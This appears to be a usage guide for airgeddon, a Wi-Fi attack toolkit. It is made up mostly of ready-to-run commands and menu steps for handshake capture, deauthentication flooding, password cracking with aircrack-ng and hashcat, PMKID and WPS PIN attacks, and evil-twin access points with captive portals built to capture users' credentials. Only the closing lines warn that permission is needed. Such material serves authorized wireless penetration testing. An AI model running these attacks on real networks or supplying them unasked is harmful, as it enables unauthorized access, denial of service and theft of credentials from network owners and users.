# Debian/Ubuntu
sudo apt-get update
sudo apt-get install git curl
sudo apt-get install aircrack-ng netcat-openbsd dnsmasq hostapd
# Arch Linux
sudo pacman -S aircrack-ng openbsd-netcat dnsmasq hostapd
# Dependencies for optional features
sudo apt-get install pixiewps bully reaver hcxdumptool hashcat
git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
cd airgeddon
chmod +x airgeddon.sh
sudo ./airgeddon.sh
docker pull v1s1t0r1sh3r3/airgeddon:latest
docker run -it --privileged -v /sys/kernel/debug:/sys/kernel/debug \
v1s1t0r1sh3r3/airgeddon:latest
# Run as root (required for monitor mode and packet injection)
sudo ./airgeddon.sh
# Run with language override
sudo ./airgeddon.sh -i es
./airgeddon.sh --help # Show help menu
./airgeddon.sh -l # List available languages
./airgeddon.sh -i [LANG] # Set interface language
./airgeddon.sh --check # Verify dependencies only
Main Menu → Change WiFi interface
Select your wireless adapter (wlan0, wlan1, etc.)
Main Menu → Monitor Mode
↳ Enable monitor mode on selected interface
↳ System will create mon0 (or similar)
↳ Required for all scanning operations
Main Menu → Monitor Mode → Disable
# Or manually:
sudo airmon-ng stop wlan0
# Check active interfaces
iwconfig
# Should show "Mode:Monitor"
# Interface mon0 or similar active
Main Menu → Scanning
↳ Explore networks around you
↳ View SSID, BSSID, Channel, Power, etc.
Available columns:
SSID - Network name
BSSID - MAC address (AA:BB:CC:DD:EE:FF)
Channel - WiFi channel (1-14 or 5G)
Security - WPA2, WPA, WEP, Open
Power - Signal strength (dBm)
Clients - Connected devices
During scan, you can:
1. Select networks by BSSID
2. Filter by channel
3. Save results to file
Main Menu → Attacks → Capture handshake
1. Select target network from scan
2. Choose capture interface (mon0)
3. Let it run until "Handshake captured" message
4. Ctrl+C to stop
Main Menu → Attacks → Capture handshake → Deauthentication
↳ Optional: Automatically send deauth frames
↳ Forces clients to reconnect and capture handshake
↳ Choose deauth timing (delay)
# Terminal 1: Start airodump-ng (capture packets)
sudo airodump-ng --bssid [BSSID] --channel [CH] \
--write handshake mon0
# Terminal 2: Send deauth frames (forces reconnect)
sudo aireplay-ng --deauth 0 -a [BSSID] \
-c [CLIENT_MAC] mon0
# Stop (Ctrl+C) when 4-way handshake captured
Main Menu → Attacks → Crack handshake
↳ Wordlist-based cracking
1. Select handshake (.cap file)
2. Choose wordlist
- rockyou.txt (common)
- Custom wordlist
3. Start aircrack-ng
4. Wait for password discovery
# Download rockyou.txt
wget https://github.com/danielmiessler/SecLists/raw/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz
tar -xzf rockyou.txt.tar.gz
# Use in airgeddon
# Point to wordlist path in cracking menu
Main Menu → Attacks → Crack handshake → Brute force
↳ Character-based cracking (slower, finds unknown passwords)
1. Select handshake
2. Set character set (lowercase, uppercase, numbers, symbols)
3. Set min/max length
4. Start attack (can take hours/days)
# Use hashcat (requires GPU)
hashcat -m 22000 handshake.22000 rockyou.txt
# Convert .cap to hashcat format first
sudo hcxdumptool -o hash.22000 -e handshake.cap
Main Menu → Attacks → Evil Twin
1. Scan and select target network
2. Create fake SSID (clone or custom)
3. Set up DHCP server
4. Start hostapd (rogue AP)
5. Optional: Enable DNS spoofing
Main Menu → Attacks → Evil Twin → With Captive Portal
1. Select target SSID
2. Configure captive portal page
3. Set redirect URL
4. Start malicious AP
5. Capture credentials from users
Configure before launch:
Interface - mon0 or AP interface
SSID - Network name (can clone target)
Channel - Match target channel
Encryption - WPA2 or Open
DHCP Range - IP address pool (192.168.1.0/24)
Gateway IP - 192.168.1.1
DNS - Redirect to custom page
Main Menu → Stop attacks
↳ Kill hostapd and dnsmasq
↳ Restore network settings
Main Menu → Attacks → WPS attacks → Reaver
1. Select target network
2. Enable Reaver
3. Start PIN guessing (up to 10,000 combinations)
4. Takes ~4-10 hours
5. On success: recovers WiFi password directly
Main Menu → Attacks → WPS attacks → Bully
↳ Faster WPS cracking alternative
1. Select target
2. Choose BULLY mode
3. More efficient on some routers
4. Fewer requests than Reaver
Main Menu → Attacks → WPS attacks → Pixie Dust
↳ MUCH faster (minutes vs hours)
1. Select vulnerable router
2. Start Pixie Dust
3. Recovers WPS PIN in minutes
4. PIN = WiFi password
# Before attack:
sudo reaver -i mon0 -b [BSSID] -S
# Shows:
# - WPS version
# - Lock status
# - Vulnerability indicators
Main Menu → Attacks → Deauth/DoS
1. Select target BSSID
2. Choose client MAC (or broadcast)
3. Set frame count (0 = infinite)
4. Start attack
5. Disconnects all clients from network
# Terminal method:
sudo aireplay-ng --deauth 100 \
-a [TARGET_BSSID] \
-c [CLIENT_MAC] mon0
# Broadcast deauth to all clients:
sudo aireplay-ng --deauth 0 \
-a [TARGET_BSSID] mon0
# Verify AP accepts injected frames:
sudo aireplay-ng --test -a [BSSID] mon0
# Required for deauth attacks to work
Main Menu → Attacks → PMKID attacks
1. Select target network
2. Start PMKID sniffing
3. Capture PMKID from probe requests
4. No client reconnection needed
Main Menu → Attacks → PMKID attacks → Crack
1. Select captured PMKID file
2. Choose wordlist
3. Start hashcat (GPU preferred)
4. Faster than 4-way handshake
# Capture PMKID packets
sudo hcxdumptool -i mon0 -o pmkid.pcapng --disable-status
# Convert to hashcat format
hcxpcapngtool -o pmkid.22000 pmkid.pcapng
# Crack
hashcat -m 22000 pmkid.22000 wordlist.txt
Main Menu → Attacks → Enterprise networks
↳ Requires username/password knowledge
1. Capture RADIUS handshakes
2. Set up fake RADIUS server
3. Create evil twin of enterprise AP
4. Redirect clients to fake auth
Main Menu → Attacks → KARMA
1. Listen for probe requests
2. Echo back any SSID clients probe for
3. Clients auto-connect to fake network
4. Capture credentials
airgeddon
├── Change WiFi interface
├── Monitor Mode (Enable/Disable)
├── Scanning
├── Attacks
│ ├── Capture handshake
│ ├── Crack handshake
│ ├── Evil Twin
│ ├── WPS attacks
│ ├── Deauth/DoS
│ ├── PMKID attacks
│ └── Enterprise attacks
├── Tools
│ ├── Packet injection test
│ ├── Traffic monitoring
│ └── Check dependencies
├── Language selection
└── Exit
• Use arrow keys / numbers to select
• Press Enter to confirm
• Ctrl+C to cancel/go back
• Follow prompts for each attack
• Monitor windows show real-time progress
aircrack-ng # Core WiFi cracking suite
netcat # Network utilities
dnsmasq # DHCP/DNS server
hostapd # AP emulation
iw # WiFi interface control
reaver # WPS PIN cracking
bully # WPS alternative
pixiewps # Pixie Dust attacks
hcxdumptool # PMKID capture
hashcat # GPU cracking
mdk3 # Advanced DoS
macchanger # MAC spoofing
# Run built-in checker
sudo ./airgeddon.sh --check
# Manual verification
which aircrack-ng
which hostapd
which reaver
docker pull v1s1t0r1sh3r3/airgeddon:latest
docker run -it --privileged \
-v /sys/kernel/debug:/sys/kernel/debug \
v1s1t0r1sh3r3/airgeddon:latest
docker run -it --privileged --net host \
-v /sys/kernel/debug:/sys/kernel/debug \
v1s1t0r1sh3r3/airgeddon:latest
docker run -it --privileged \
-v ~/wordlists:/root/wordlists \
v1s1t0r1sh3r3/airgeddon:latest
# Check conflicts
sudo airmon-ng check kill
# Force interface down and restart
sudo ip link set wlan0 down
sudo airmon-ng start wlan0
# Verify monitor mode active
iwconfig | grep Monitor
# Check antenna
sudo iw list | grep -i antenna
# Try different channel range
# Some adapters don't scan 5GHz by default
# Increase deauth attempts
sudo aireplay-ng --deauth 50 -a [BSSID] mon0
# Check channel matches
sudo iwconfig mon0
# Verify adapter supports injection
sudo aireplay-ng --test -a [BSSID] mon0
# Verify target supports WPS
sudo reaver -i mon0 -b [BSSID] -S
# Some routers lock WPS (try Pixie Dust first)
# Check for rate limiting/lockout status
# Check DHCP logs
tail -f /var/log/dnsmasq.log
# Verify hostapd running
ps aux | grep hostapd
# Check IP forwarding
sudo sysctl net.ipv4.ip_forward=1
⚠️ Only use on networks you own or have explicit permission to test
⚠️ Unauthorized network access is illegal in most jurisdictions
⚠️ Use for authorized penetration testing and security research only
⚠️ Always obtain written authorization before testing
